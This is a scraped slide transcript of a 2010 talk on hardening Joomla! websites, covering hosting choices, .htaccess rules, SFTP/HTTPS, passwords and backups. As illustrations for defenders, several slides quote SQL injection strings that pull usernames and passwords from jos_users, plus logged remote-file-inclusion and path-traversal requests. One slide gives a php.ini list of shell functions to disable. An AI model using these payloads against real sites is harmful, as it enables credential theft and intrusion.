Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Security talk: Fortifying your Joomla! website

7,499 views

Published on

Published in: Technology
  • Very nice Radek! Thanks for sharing.

    Last day I should have cloned myself or something, missed so many good presentations.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • The article, including the full .htaccess example can be found here: http://sobi.it/jab10/p/security/
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Security talk: Fortifying your Joomla! website

  1. 1. Security talk: Fortifying your Joomla! Website http://dilbert.com/strips/comic/2004-01-11/ Radek Suski http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
  2. 2. Where to start? <ul><li>Long before you go on-line
  3. 3. Choose the right hosting
  4. 4. Choose the right components
  5. 5. Inform yourself about good practices ....
  6. 6. .... it means:
  7. 7. You're right here :) </li></ul>Copyright 2010, Sigsiu.NET GmbH
  8. 8. <ul>Choose the right host </ul><ul><li>Apache 2
  9. 9. PHP 5
  10. 10. MySQL 5
  11. 11. htaccess support
  12. 12. Safe Mode Off !!!
  13. 13. Register Globals Off !!!
  14. 14. Access via SFTP
  15. 15. HTTPS/SSL support </li></ul>Copyright 2010, Sigsiu.NET GmbH
  16. 16. <ul>Choose right components </ul><ul>Components published at JED http://extensions.joomla.org/ Check Vulnerable Extensions List regularly http://docs.joomla.org/Vulnerable_Extensions_List </ul>Copyright 2010, Sigsiu.NET GmbH
  17. 17. Installing Joomla! Copyright 2010, Sigsiu.NET GmbH
  18. 18. Typical hack attempt ...&catid=99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/ jos_users /* Copyright 2010, Sigsiu.NET GmbH
  19. 19. The point is: be unconventional! <ul><li>Default username is “Admin”
  20. 20. User ID of the first super admin is 62 </li></ul>index.php?option=com_vulnurable... &id=-1+UNION+ALL+SELECT+username,password+FROM+ jos_users +WHERE+ id=62 ... Copyright 2010, Sigsiu.NET GmbH
  21. 21. Change the super admin user ID http://sobi.it/SuperAdmin/62/ Copyright 2010, Sigsiu.NET GmbH
  22. 22. Main problem <ul>we have to deal with kids with too much time </ul>“ A scriptkiddie, usually a teenager, is a person of limited technical proficiency who wants to gain control of your system. But, by using a single tool and a system exploit can cause you a great deal of grief” - source Copyright 2010, Sigsiu.NET GmbH
  23. 23. Scriptkiddies <ul><li>Are sometimes randomly successful
  24. 24. Are ambitious
  25. 25. In most cases causing “only” heavy load:
  26. 26. Default Joomla! Site: </li></ul><ul>( ~23 SQL Queries executed + ~15 MB Memory used + ~ 170.000 PHP Instructions ) x </ul>Scriptkiddies up to 100 hack attempts in a minute Copyright 2010, Sigsiu.NET GmbH
  27. 27. htaccess – powerful weapon .htaccess - (hypertext access) is the default name of a directory-level configuration file that allows for decentralized management of web server configuration. http://en.wikipedia.org/wiki/Htaccess Copyright 2010, Sigsiu.NET GmbH
  28. 28. Default Joomla! htaccess Copyright 2010, Sigsiu.NET GmbH
  29. 29. Prevent access to PHP files 195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] &quot;GET / /administrator/components/com_remository/admin.remository.php ?mosConfig.absolute.path=http://xxxx.yy/id1.txt? HTTP/1.1&quot; 404 95 &quot;Mozilla/5.0&quot; Copyright 2010, Sigsiu.NET GmbH
  30. 30. Forbid access from “dangerous” UA GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1&quot; 403 1043 &quot; libwww-perl /5.829 GET /index.php?option=http://xxxx.go.th/Mail.txt? HTTP/1.1&quot; 403 1029 &quot;Mozilla/3.0 (compatible; Indy Library ) GET /index.php?topic=http://xxx.ru/images/cs.txt? HTTP/1.1&quot; 403 1029 &quot; Wget /1.1 (compatible; i486; Linux; RedHat7.3) Copyright 2010, Sigsiu.NET GmbH
  31. 31. Prevent most common SQL-Injections 2274.xxx.com - - [30/Apr/2008:15:38:47 +0200] &quot;GET /index.php?option=com_xxxx &id=1/**/ union /**/ select /**/1, concat (username,0x3a,password)... Copyright 2010, Sigsiu.NET GmbH
  32. 33. Disclose as little information as possible
  33. 34. Admin Panel Log-In & FTP
  34. 35. Who can see it? Copyright 2010, Sigsiu.NET GmbH
  35. 36. HTTPS/SSL & SFTP <ul><li>Use SFTP instead of FTP
  36. 37. Use HTTPS for log-in </li></ul>Copyright 2010, Sigsiu.NET GmbH
  37. 38. HTTPS/SSL & SFTP - Problems <ul><li>Provider have to offer SSH/SFTP
  38. 39. Provider have to offer SSL or SSL-Proxy
  39. 40. Invalid SSL-Cert throws error in browser
  40. 41. Valid SSL-Certificates are expensive </li></ul>Copyright 2010, Sigsiu.NET GmbH
  41. 42. HTTPS/SSL - Problems <ul><li>Valid SSL-Certificates are expensive </li></ul>https://www.startssl.com/ Copyright 2010, Sigsiu.NET GmbH
  42. 43. Username & Password <ul>Username is almost so important as password </ul>… once again Copyright 2010, Sigsiu.NET GmbH
  43. 44. Username & Password <ul>Automatic generated password: k5dRGCUxGs </ul>… once again Copyright 2010, Sigsiu.NET GmbH
  44. 45. Username & Password <ul>If we can articulate something, we can remember it </ul>… once again https://pass.sigsiu.net/ Copyright 2010, Sigsiu.NET GmbH
  45. 46. File permissions <ul>Very unlucky number: 777 </ul>Copyright 2010, Sigsiu.NET GmbH
  46. 47. php.ini <ul><li>Disable “dangerous” functions ??!! disable_functions = system, shell_exec, passthru, exec, phpinfo, popen, proc_open
  47. 48. how can a function be dangerous ??
  48. 49. Use open_basedir
  49. 50. open_basedir = /path/to/www </li></ul>Copyright 2010, Sigsiu.NET GmbH
  50. 51. Is your computer safe? <ul>“ There is no point in following all the best Joomla! security advice you can find if you don't take the simple step of securing your own personal computer with up to date anti-virus software.” Brian Teeman </ul>Copyright 2010, Sigsiu.NET GmbH
  51. 52. But what if .... ? <ul>Backup, Backup, Backup ..... and one more time: Backup </ul>Copyright 2010, Sigsiu.NET GmbH
  52. 53. Thank you for your attention! http://www.Sigsiu.NET https://shop.Sigsiu.NET http://joomla.Sigsiu.NET http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html Copyright 2010, Sigsiu.NET GmbH

×